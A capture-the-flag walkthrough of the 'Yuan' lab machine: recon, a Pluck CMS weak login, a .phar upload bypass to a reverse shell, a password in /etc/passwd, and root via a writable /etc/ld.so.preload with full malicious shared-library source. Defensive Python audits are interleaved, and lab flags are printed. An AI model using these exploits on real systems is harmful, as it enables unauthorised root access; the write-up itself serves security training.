Yuan

Target notes

  • QQ group: 660930334

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:30 CST
Nmap scan report for 192.168.2.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00039s latency).
MAC Address: 08:00:27:6D:22:97 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.30
Host is up (0.00060s latency).
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.14 seconds

Target IP: 192.168.2.30

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:30 CST
Nmap scan report for 192.168.2.30
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

Open ports: 22, 80

2) Service and version scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:31 CST
Nmap scan report for 192.168.2.30
Host is up (0.00076s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Maze-Sec \xE5\x85\x83\xE6\x97\xA6\xE5\xBA\x86\xE7\xA5\x9D
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
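The scan output above is what a defender usually has to turn into a baseline check ("which hosts expose which services, and is any of that unexpected?"). The parser below is an added example written for this page, not code from the original write-up; it reads nmap's normal output format into records and compares them against a hypothetical per-host allowlist of expected ports. The sample text is a constructed excerpt of the service scan shown above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample, modelled on the service scan above (whitespace collapsed
# the way the page shows it; real nmap output pads the columns, which the
# regex below accepts as well).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.2.30
Host is up (0.00076s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
"""


@dataclass
class PortRecord:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# <port>/<proto> <state> <service> [<free-text version>]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text: str) -> List[PortRecord]:
    """Return one record per port line, tagged with the host it belongs to.
    Script output lines (starting with '|') and banners are ignored."""
    records: List[PortRecord] = []
    host = ""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(host, int(port), proto, state,
                                      service, version.strip()))
    return records


def unexpected_open_ports(records: List[PortRecord],
                          baseline: Dict[str, Set[int]]) -> List[PortRecord]:
    """Open ports that are not in the host's expected set (hypothetical baseline
    supplied by the caller); anything returned deserves a look."""
    return [r for r in records
            if r.state == "open" and r.port not in baseline.get(r.host, set())]


if __name__ == "__main__":
    recs = parse_nmap(SAMPLE_SCAN)
    for r in recs:
        print(f"{r.host} {r.port}/{r.proto} {r.state} {r.service} {r.version}")
    # Hypothetical baseline: this host is only supposed to expose SSH.
    for r in unexpected_open_ports(recs, {"192.168.2.30": {22}}):
        print("unexpected:", r.port, r.service)
```

Running it on the sample flags port 80 as not part of the (hypothetical) baseline; on real output, feed the file produced by `nmap -oN` into `parse_nmap`.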

3) UDP scan

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-04 14:32 CST
Nmap scan report for 192.168.2.30
Host is up (0.00098s latency).
All 100 scanned ports on 192.168.2.30 are in ignored states.
Not shown: 53 closed udp ports (port-unreach), 47 open|filtered udp ports (no-response)
MAC Address: 08:00:27:95:B9:E8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.70 seconds

II. Web penetration

1. Directory scanning

┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://192.168.2.30 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/index.html (Status: 200) [Size: 16876]
/pluck (Status: 301) [Size: 312] [--> http://192.168.2.30/pluck/]
...

Found the directory /pluck; visiting it shows Pluck CMS, version 4.7.7.

2. Pluck CMS

1) Weak-password login

After a few attempts, the weak password pluck was found to work.

2) File upload

Found the file upload; trying to upload a .php file, it was renamed to .php.txt.

Using the .phar extension instead, the upload succeeded and a reverse shell came back.
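The rename-to-.txt behaviour is a denylist: it neutralises the one extension it knows about and passes everything else through, and on Debian the Apache PHP module configuration hands .phar and .phtml to the interpreter just like .php. The example below is added for this page and is not Pluck's own code; it contrasts that denylist logic with an allowlist check that only accepts a bare filename whose final extension is permitted, rejects server-executable extensions in any position, and never reuses the client-supplied name on disk. The sample filenames and the `ALLOWED_EXT` set are constructed for the demonstration.

```python
import os
import uuid

# Constructed filenames for the demonstration (not from the page, which only
# shows the .php -> .php.txt rename and the .phar upload).
SAMPLES = ["avatar.png", "shell.php", "shell.phar", "shell.phtml",
           "shell.PhP", "notes.txt", "x.php.png", "../../evil.php"]


def denylist_rename(name: str) -> str:
    """Denylist-style handling: only an exact '.php' suffix is neutralised by
    appending '.txt'. Anything the list does not name passes through untouched."""
    if name.endswith(".php"):
        return name + ".txt"
    return name


# Allowlist of extensions this hypothetical upload endpoint accepts.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "txt", "pdf"}
# Extensions a typical Apache/PHP setup may hand to the PHP interpreter; an
# occurrence anywhere in the name is rejected, not just at the end, because
# some handler configurations match on any segment of a multi-dot name.
EXECUTABLE_EXT = {"php", "phar", "phtml", "php3", "php4", "php5", "php7", "phps"}


def allowlist_accept(name: str) -> bool:
    """Accept only a bare filename (no path components) whose final extension
    is allowlisted and which carries no executable extension in any position."""
    base = os.path.basename(name.replace("\\", "/"))
    if base != name or base in ("", ".", ".."):
        return False                      # path components are never accepted
    parts = base.lower().split(".")       # case-insensitive: 'PhP' is still php
    if len(parts) < 2 or not all(parts):
        return False                      # no extension, or an empty segment ('a..png')
    if any(p in EXECUTABLE_EXT for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXT


def stored_name(name: str) -> str:
    """Never reuse the client's name on disk: keep only the validated extension
    and generate the rest server-side."""
    if not allowlist_accept(name):
        raise ValueError(f"rejected upload name: {name!r}")
    return f"{uuid.uuid4().hex}.{name.rsplit('.', 1)[1].lower()}"


if __name__ == "__main__":
    for n in SAMPLES:
        print(f"{n!r:20} denylist -> {denylist_rename(n)!r:22} "
              f"allowlist -> {'accept' if allowlist_accept(n) else 'reject'}")
```

The denylist column shows `shell.phar`, `shell.phtml` and `shell.PhP` passing through unchanged, which is exactly the gap the walkthrough used; the allowlist column rejects all of them and accepts only the image and text names.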

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.30] 32776
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Stabilizing the shell

script /dev/null -c bash
# Press Ctrl+Z to suspend it
stty raw -echo; fg
# Press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

III. Privilege escalation

1. Getting tommy4 privileges

Reading /etc/passwd, the comment field of user tommy4 contains the password v3fXTfJ06cMMfAKGQwkZ.

www-data@Yuan:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
tommy4:x:1000:1000:,v3fXTfJ06cMMfAKGQwkZ,:/home/tommy4:/bin/bash
xnzcode:x:1001:1001:,,,:/home/xnzcode:/bin/bash
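A credential dropped into the world-readable GECOS comment field is easy to miss in a long listing. The audit below is an added example written for this page, not part of the original write-up: it parses passwd(5) lines, flags GECOS sub-fields that look like secrets rather than names or phone numbers (one unbroken run of 12 or more letters and digits mixing both cases and a digit, a heuristic chosen here), and separately flags accounts whose password field holds a hash or nothing at all instead of the usual shadow reference. The sample is a constructed excerpt modelled on the listing above.

```python
import re
from typing import Dict, List

# Constructed /etc/passwd excerpt modelled on the listing above: the tommy4
# line is the one shown on the page, the others are ordinary Debian accounts.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
tommy4:x:1000:1000:,v3fXTfJ06cMMfAKGQwkZ,:/home/tommy4:/bin/bash
xnzcode:x:1001:1001:,,,:/home/xnzcode:/bin/bash
"""

# Heuristic: a GECOS sub-field that is one unbroken run of 12+ letters and
# digits with both cases and at least one digit looks like a secret, not a
# full name, room number or phone number.
SECRET_LIKE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{12,}$")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd(5) lines into their seven fields; malformed lines are skipped."""
    entries: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def secret_like_gecos(text: str) -> Dict[str, List[str]]:
    """Users whose GECOS comment contains a sub-field that looks like a credential."""
    hits: Dict[str, List[str]] = {}
    for e in parse_passwd(text):
        sus = [p.strip() for p in e["gecos"].split(",") if SECRET_LIKE.match(p.strip())]
        if sus:
            hits[e["name"]] = sus
    return hits


def inline_password_field(text: str) -> List[str]:
    """Users whose password field is neither the shadow reference 'x' nor a
    lock marker: either a real hash sitting in the world-readable file, or an
    empty field (no password at all)."""
    return [e["name"] for e in parse_passwd(text)
            if e["pw"] not in ("x", "*") and not e["pw"].startswith("!")]


if __name__ == "__main__":
    for user, parts in secret_like_gecos(SAMPLE_PASSWD).items():
        print(f"[!] {user}: secret-looking GECOS field(s) {parts}")
    for user in inline_password_field(SAMPLE_PASSWD):
        print(f"[!] {user}: password field is not a shadow reference")
```

Pointed at a real file (`secret_like_gecos(open('/etc/passwd').read())`), the first check reports tommy4 on this box; the heuristic will also fire on legitimate long alphanumeric tokens, so treat hits as review items rather than proof.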

Successfully switched to the tommy4 user.

www-data@Yuan:/home$ su tommy4
Password:
tommy4@Yuan:/home$ id
uid=1000(tommy4) gid=1000(tommy4) groups=1000(tommy4)

2. Getting root

Look for world-writable files, excluding /proc and /sys

tommy4@Yuan:~$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/etc/ld.so.preload
/var/www/html/pluck/data/settings/install.dat
/var/www/html/pluck/data/settings/pages/1.1.php
/var/www/html/pluck/data/settings/pages/2.maze-sec.php
/var/www/html/pluck/data/settings/themepref.php
/var/www/html/pluck/data/settings/pass.php
/var/www/html/pluck/data/settings/options.php
/var/www/html/pluck/data/settings/token.php
/var/www/html/pluck/data/settings/update_lastcheck.php
/var/www/html/pluck/images/rev.jpg

/etc/ld.so.preload turns out to be writable

tommy4@Yuan:~$ ls -la /etc/ld.so.preload 
-rw-r--rw- 1 root root 0 Dec 20 06:27 /etc/ld.so.preload

This is a classic privilege-escalation vector. /etc/ld.so.preload lists shared libraries to be preloaded when any program starts; if we can control this file, we can make any non-SUID program running as root load our malicious shared library.
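Because the dynamic loader honours /etc/ld.so.preload for every process, the defensive checks are narrow and cheap: the file should normally not exist at all, and if it does it must be root-owned, not group- or world-writable, and every library it names must itself be a root-owned, non-writable file outside user-writable directories. The audit below is an added example for this page (not the author's code): `audit_preload` reports findings for a given file, and `demo_temp_case` reproduces the weak state shown above (mode 0646 and a library path under /tmp) in a throwaway temporary file so the check can be exercised without touching the real system.

```python
import os
import stat
import tempfile
from typing import List

PRELOAD_PATH = "/etc/ld.so.preload"
# Directories an unprivileged user can normally write to; a preloaded library
# living under one of them is a finding on its own.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def _check_file(label: str, path: str) -> List[str]:
    """Ownership and permission checks shared by the preload file and each library."""
    findings: List[str] = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{label}: {path} is a symlink")
    if st.st_uid != 0:
        findings.append(f"{label}: {path} is owned by uid {st.st_uid}, not root")
    mode = stat.S_IMODE(st.st_mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{label}: {path} is group/world writable (mode {mode:04o})")
    return findings


def audit_preload(path: str = PRELOAD_PATH) -> List[str]:
    """Return a list of findings; an empty list means the file is absent.
    On most systems the file does not exist, which is the expected state."""
    if not os.path.lexists(path):
        return []
    findings = ["preload file present (review whether it is intentional)"]
    findings += _check_file("preload file", path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    entries: List[str] = []
    for line in content.splitlines():
        # glibc separates entries by whitespace or ':' and allows '#' comments
        entries += line.split("#", 1)[0].replace(":", " ").split()
    for lib in entries:
        if lib.startswith(USER_WRITABLE_PREFIXES):
            findings.append(f"library {lib} lives in a user-writable location")
        if not os.path.lexists(lib):
            findings.append(f"library {lib} does not exist (dangling entry)")
            continue
        findings += _check_file("library", lib)
    return findings


def demo_temp_case() -> List[str]:
    """Reproduce the weak state from the write-up in a temporary file (constructed
    for the demo): mode 0646 and a library path under /tmp; return the findings."""
    fd, tmp = tempfile.mkstemp(prefix="ld.so.preload.demo.")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write("/tmp/does-not-exist-demo.so\n")
        os.chmod(tmp, 0o646)
        return audit_preload(tmp)
    finally:
        os.unlink(tmp)


if __name__ == "__main__":
    for f in audit_preload():
        print("[!]", f)
    for f in demo_temp_case():
        print("[demo]", f)
```

As a standing control, the same checks belong in whatever file-integrity tooling is in use: alert on creation or modification of /etc/ld.so.preload, and on any mode change that makes it writable by anyone but root.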

Malicious shared library

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    if (getuid() == 0) {
        setgid(0);
        setuid(0);
        // Copy bash and set the SUID bit on the copy
        system("cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash");
    }
}

Compiling and using it

# Compile
gcc -fPIC -shared -nostartfiles -o shell.so shell.c
chmod 755 shell.so

# Write it into ld.so.preload
echo "/tmp/shell.so" > /etc/ld.so.preload

# Trigger it (request the web page, or wait for any root process to run); run this on the attacking machine
curl http://192.168.2.30

# Clear ld.so.preload
echo "" > /etc/ld.so.preload

# Get a root shell
/tmp/rootbash -p

Root obtained

tommy4@Yuan:/tmp$ /tmp/rootbash -p
rootbash-5.0# id
uid=1000(tommy4) gid=1000(tommy4) euid=0(root) groups=1000(tommy4)

IV. Reading the flags

rootbash-5.0# cat /root/root.txt /home/tommy4/user.txt 
flag{root-6abd51ee921a5a9db30b78cf17d85dc7}
flag{user-96d6fc824b0ea03a4e3dbd81f9c5cd76}

Yuan
http://miao-sec.github.io/Maze-sec/Yuan/
Author: Miao
Published: January 9, 2026
License: BY-MIAO